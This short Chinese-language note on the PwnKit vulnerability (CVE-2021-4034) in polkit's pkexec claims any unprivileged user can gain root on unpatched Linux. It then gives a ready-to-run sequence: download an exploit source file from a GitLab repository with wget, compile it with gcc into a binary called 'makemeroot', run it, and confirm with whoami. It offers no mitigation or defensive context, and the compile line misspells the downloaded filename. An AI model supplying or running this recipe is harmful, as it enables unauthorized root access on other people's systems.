CVE-2021-4034 (PWNKIT)
Polkit 的 pkexec 中存在一个内存损坏漏洞,该漏洞允许任何非特权用户在默认 polkit 配置下,在易受攻击的系统上获取完整的 root 权限。
易于使用,可在任何未打补丁的 Linux 系统上实现本地权限提升。
wget https://gitlab.com/nelox/pwnkit-vulnerability/blasty-vs-pkexec.c
gcc bblasty-vs-pkexec.c -o makemeroot
./makemeroot
whoami